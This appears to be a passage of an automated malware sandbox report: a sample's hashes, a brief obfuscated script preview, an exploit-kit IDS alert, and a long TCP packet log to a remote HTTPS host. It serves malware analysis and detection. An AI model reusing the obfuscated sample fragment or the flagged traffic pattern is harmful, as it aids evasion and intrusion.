                                            SHA512:94543f5006c02fe0df66d9c6517831bc7afa22336372d2f87de1f0d21028b5d228850fe4d03e9c8721d4fb4e44d34c711a21a7abf35e1268f1293daab07b30b2
                                            SSDEEP:12288:Ppg9Y9TU6WMHM8GjqgjuLlXxp7kuqXZqDpw20ADLlpfMom6av1o0pLtxoo/Obx5X:GUsZkfqezIZy30W7
                                            TLSH:E5B41B1135EAB048F1F32FA356ED55E94FABB5662A36911E7048070F4BA3E80CE51B73
                                            File Content Preview:..f.L.L.o.O.o.b.W.r.A.p.A.C.O.R.G.i.W.u.W.Z.a.K.W.i.p.U.f.W.x.P.O.L.a.A.A.L.K.G.i.m.j.O.t.x.c.c.K.z.i.O.P.Z.W.O.e.L.R.O.U.d.i.b.L.O.P.c.W. .=. .".A.i.t.x.B.t.q.L.u.a.K.W.W.r.i.W.A.c.z.q.U.t.G.N.H.W.p.c.t.W.A.A.L.f.u.k.f.i.W.L.m.L.A.B.b.A.P.L.G.A.o.c.A.K.u
                                            Icon Hash:68d69b8f86ab9a86
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-02T05:22:14.532509+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11162.159.140.237443192.168.2.849705TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 2, 2024 05:22:09.763345003 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:09.763380051 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:09.763473034 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:09.772000074 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:09.772013903 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.426822901 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.427093983 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.431406975 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.431423903 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.431751013 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.447789907 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.495403051 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.718492985 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.718532085 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.718569994 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.718636036 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.718652010 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.718699932 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.718699932 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.745038033 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.745060921 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.745234013 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.745234013 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.745244026 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.745348930 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.784898043 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.784924030 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.785074949 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.785095930 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.785162926 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.836236000 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.836260080 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.836369038 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.836379051 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.836436033 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.837995052 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.838011026 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.838098049 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.838105917 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.838176966 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.838994980 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.839010954 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.839082956 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.839088917 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.839135885 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.903353930 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.903379917 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.903542042 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.903556108 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.903639078 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.929178953 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.929203987 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.929331064 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.929342031 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.929394007 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.930635929 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.930656910 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.930748940 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.930757046 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.930834055 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.931694984 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.931745052 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.931796074 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.931796074 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.931804895 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.931849957 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.932842970 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.932948112 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.932976961 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.932984114 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.933018923 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.933111906 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.933911085 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.933928013 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.934004068 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.934011936 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.934067011 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.943741083 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.943758965 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.943864107 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.943872929 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.943942070 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.969672918 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.969701052 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.969916105 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:10.969924927 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:10.969975948 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.001698971 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.001715899 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.001924038 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.001933098 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.001979113 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.022574902 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.022593975 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.022695065 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.022716045 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.022762060 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.026791096 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.026818037 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.026855946 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.026864052 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.026887894 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.026906967 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.027477980 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.027501106 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.027554989 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.027563095 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.027602911 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.028422117 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.028436899 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.028496981 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.028506041 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.028572083 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.032078028 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.032094955 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.032165051 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.032174110 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.032206059 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.039772987 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.039791107 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.039913893 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.039922953 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.039992094 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.064593077 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.064620972 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.064757109 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.064757109 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.064769030 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.064831018 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.097718000 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.097745895 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.097896099 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.097907066 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.097954035 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.114131927 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.114161015 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.114232063 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.114242077 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.114284992 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.117903948 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.117929935 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.118004084 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.118016005 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.118057966 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.118701935 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.118722916 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.118777990 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.118784904 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.118820906 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.119554996 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.119570971 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.119620085 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.119627953 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.119661093 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.119967937 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.119992018 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.120028973 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.120035887 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.120059013 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.120079041 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.131059885 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.131081104 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.131170988 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.131191015 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.131233931 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.157377958 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.157402992 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.162971020 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.162986994 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.163062096 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.190155983 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.190180063 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.190324068 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.190337896 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.190382957 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.208786011 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.208811045 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.208894968 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.208906889 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.208945036 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.210491896 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.210508108 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.210572004 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.210578918 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.210614920 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.211236954 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.211252928 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.211311102 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.211317062 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.211354971 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.212095022 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.212115049 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.212171078 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.212177992 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.212213039 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.213135958 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.213151932 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.213197947 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.213212967 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.213246107 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.223601103 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.223620892 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.223692894 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.223701000 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.223737001 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.249959946 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.249984026 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.250057936 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.250066996 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.250102997 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.287869930 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.287900925 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.288047075 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.288059950 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.288101912 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.301661015 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.301677942 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.301758051 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.301770926 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.301805973 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.303136110 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.303152084 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.303201914 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.303216934 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.303255081 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.304193974 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304210901 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304250002 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.304256916 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304284096 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.304301977 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.304898024 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304927111 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304964066 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.304972887 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.304994106 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.305006981 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.305778980 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.305799007 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.305847883 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.305855989 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.305887938 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.316289902 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.316306114 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.316365004 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.316375017 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.316462994 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.342541933 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.342585087 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.342767000 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.342782974 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.342830896 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.380424023 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.380461931 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.380561113 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.380569935 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.380625963 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.394237041 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.394253016 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.394334078 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.394341946 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.394382000 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.395909071 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.395926952 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.395991087 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.395998955 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.396040916 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.396929979 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.396946907 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.397052050 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.397058964 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.397099972 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.397681952 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.397705078 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.397758007 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.397766113 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.397806883 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.398524046 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.398544073 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.398605108 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.398619890 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.398657084 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.408852100 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.408869982 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.408936977 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.408946037 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.408993006 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.435734034 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.435755014 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.435887098 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.435913086 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.435957909 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.473248005 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.473278999 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.473400116 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.473419905 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.473462105 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.487056017 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.487073898 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.487143993 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.487152100 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.487220049 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.488714933 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.488730907 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.488792896 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.488806009 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.488848925 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.489804983 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.489826918 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.489886999 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.489897013 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.489937067 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.490309000 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.490324020 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.490377903 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.490386009 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.490431070 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.491209030 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.491223097 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.491280079 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.491286993 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.491326094 CEST49704443192.168.2.8207.241.227.240
                                            Oct 2, 2024 05:22:11.501645088 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.501662016 CEST44349704207.241.227.240192.168.2.8
                                            Oct 2, 2024 05:22:11.501739979 CEST49704443192.168.2.8207.241.227.240
